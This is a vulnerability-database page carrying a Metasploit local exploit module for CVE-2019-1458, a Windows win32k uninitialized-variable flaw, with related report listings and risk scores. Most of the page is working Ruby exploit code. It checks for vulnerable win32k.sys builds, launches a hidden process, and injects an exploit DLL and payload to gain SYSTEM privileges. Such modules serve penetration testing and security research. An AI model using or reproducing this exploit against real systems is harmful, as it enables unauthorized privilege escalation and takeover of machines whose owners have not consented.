Microsoft Windows Uninitialized Variable Local Privilege Escalation Exploit

🗓️ 15 Oct 2020 00:00:00Reported by metasploitType

zdt🔗 0day.today👁 90 Views

Microsoft Windows Uninitialized Variable Local Privilege Escalatio

Reporter	Title	Published	Views	Family All 72
0day.today	Microsoft Windows - (WizardOpium) Local Privilege Escalation Exploit	9 Mar 202000:00	–	zdt
GithubExploit	Exploit for CVE-2019-1458	3 Mar 202017:55	–	githubexploit
GithubExploit	Exploit for CVE-2019-1458	11 Mar 202008:30	–	githubexploit
GithubExploit	Exploit for CVE-2019-1458	11 Mar 202008:30	–	githubexploit
ATTACKERKB	Chrome 0-day exploit CVE-2019-13720 used in Operation WizardOpium	10 Oct 201900:00	–	attackerkb
ATTACKERKB	CVE-2019-1458	10 Dec 201900:00	–	attackerkb
BDU FSTEC	The vulnerability of the win32k component of the Windows operating system, which allows a hacker to increase their privileges	11 Feb 202000:00	–	bdu_fstec
Circl	CVE-2019-1458	10 Dec 201919:52	–	circl
CISA KEV Catalog	Microsoft Win32k Privilege Escalation Vulnerability	10 Jan 202200:00	–	cisa_kev
CISA	CISA Adds 15 Known Exploited Vulnerabilities to Catalog	10 Jan 202200:00	–	cisa

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/post/file'
require 'msf/core/exploit/exe'
require 'msf/core/post/windows/priv'

class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::ReflectiveDLLInjection
  include Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
        update_info(
          info,
          'Name' => 'Microsoft Windows Uninitialized Variable Local Privilege Elevation',
          'Description' => %q{
          This module exploits CVE-2019-1458, an arbitrary pointer dereference vulnerability
          within win32k which occurs due to an uninitalized variable, which allows user mode attackers
          to write a limited amount of controlled data to an attacker controlled address
          in kernel memory. By utilizing this vulnerability to execute controlled writes
          to kernel memory, an attacker can gain arbitrary code execution
          as the SYSTEM user.

          This module has been tested against Windows 7 x64 SP1. Offsets within the
          exploit code may need to be adjusted to work with other versions of Windows.
          The exploit can only be triggered once against the target and can cause the
          target machine to reboot when the session is terminated.
          },
          'License' => MSF_LICENSE,
          'Author' =>
              [
                'piotrflorczyk', # poc
                'unamer', # exploit
                'timwr', # msf module
              ],
          'Platform' => 'win',
          'SessionTypes' => ['meterpreter'],
          'Targets' =>
              [
                ['Windows 7 x64', { 'Arch' => ARCH_X64 }]
              ],
          'Notes' =>
              {
                'Stability' => [ CRASH_OS_RESTARTS ],
                'Reliability' => [ UNRELIABLE_SESSION ]
              },
          'References' =>
              [
                ['CVE', '2019-1458'],
                ['URL', 'https://github.com/unamer/CVE-2019-1458'],
                ['URL', 'https://github.com/piotrflorczyk/cve-2019-1458_POC'],
                ['URL', 'https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/'],
                ['URL', 'https://googleprojectzero.blogspot.com/p/rca-cve-2019-1458.html']
              ],
          'DisclosureDate' => '2019-12-10',
          'DefaultTarget' => 0,
          'AKA' => [ 'WizardOpium' ]
        )
    )
    register_options([
      OptString.new('PROCESS', [true, 'Name of process to spawn and inject dll into.', 'notepad.exe'])
    ])
  end

  def setup_process
    process_name = datastore['PROCESS']
    begin
      print_status("Launching #{process_name} to host the exploit...")
      launch_process = client.sys.process.execute(process_name, nil, 'Hidden' => true)
      process = client.sys.process.open(launch_process.pid, PROCESS_ALL_ACCESS)
      print_good("Process #{process.pid} launched.")
    rescue Rex::Post::Meterpreter::RequestError
      # Sandboxes could not allow to create a new process
      # stdapi_sys_process_execute: Operation failed: Access is denied.
      print_error('Operation failed. Trying to elevate the current process...')
      process = client.sys.process.open
    end
    process
  end

  def check
    sysinfo_value = sysinfo['OS']

    if sysinfo_value !~ /windows/i
      # Non-Windows systems are definitely not affected.
      return CheckCode::Safe
    end

    file_path = expand_path('%WINDIR%\\system32\\win32k.sys')
    major, minor, build, revision, branch = file_version(file_path)
    vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")

    build_num_gemversion = Gem::Version.new("#{major}.#{minor}.#{build}.#{revision}")

    # Build numbers taken from https://www.qualys.com/research/security-alerts/2019-12-10/microsoft/
    if (build_num_gemversion >= Gem::Version.new('6.0.6000.0')) && (build_num_gemversion < Gem::Version.new('6.0.6003.20692')) # Windows Vista and Windows Server 2008
      return CheckCode::Appears
    elsif (build_num_gemversion >= Gem::Version.new('6.1.7600.0')) && (build_num_gemversion < Gem::Version.new('6.1.7601.24540')) # Windows 7 and Windows Server 2008 R2
      return CheckCode::Appears
    elsif (build_num_gemversion >= Gem::Version.new('6.2.9200.0')) && (build_num_gemversion < Gem::Version.new('6.2.9200.22932')) # Windows 8 and Windows Server 2012
      return CheckCode::Appears
    elsif (build_num_gemversion >= Gem::Version.new('6.3.9600.0')) && (build_num_gemversion < Gem::Version.new('6.3.9600.19574')) # Windows 8.1 and Windows Server 2012 R2
      return CheckCode::Appears
    elsif (build_num_gemversion >= Gem::Version.new('10.0.10240.0')) && (build_num_gemversion < Gem::Version.new('10.0.10240.18427')) # Windows 10 v1507
      return CheckCode::Appears
    elsif (build_num_gemversion >= Gem::Version.new('10.0.10586.0')) && (build_num_gemversion < Gem::Version.new('10.0.10586.99999')) # Windows 10 v1511
      return CheckCode::Appears
    elsif (build_num_gemversion >= Gem::Version.new('10.0.14393.0')) && (build_num_gemversion < Gem::Version.new('10.0.14393.3383')) # Windows 10 v1607
      return CheckCode::Appears
    else
      return CheckCode::Safe
    end
  end

  def exploit
    super

    if is_system?
      fail_with(Failure::None, 'Session is already elevated')
    end

    if sysinfo['Architecture'] != ARCH_X64
      fail_with(Failure::NoTarget, 'Running against 32-bit systems is not supported')
    end

    process = setup_process
    library_data = exploit_data('CVE-2019-1458', 'exploit.dll')
    print_status("Injecting exploit into #{process.pid} ...")
    exploit_mem, offset = inject_dll_data_into_process(process, library_data)
    print_status("Exploit injected. Injecting payload into #{process.pid}...")
    encoded_payload = payload.encoded
    payload_mem = inject_into_process(process, [encoded_payload.length].pack('I<') + encoded_payload)

    # invoke the exploit, passing in the address of the payload that
    # we want invoked on successful exploitation.
    print_status('Payload injected. Executing exploit...')
    process.thread.create(exploit_mem + offset, payload_mem)
  end
end

15 Oct 2020 00:00Current

8.5High risk

Vulners AI Score8.5

CVSS 27.2

CVSS 3.17.8

EPSS0.9216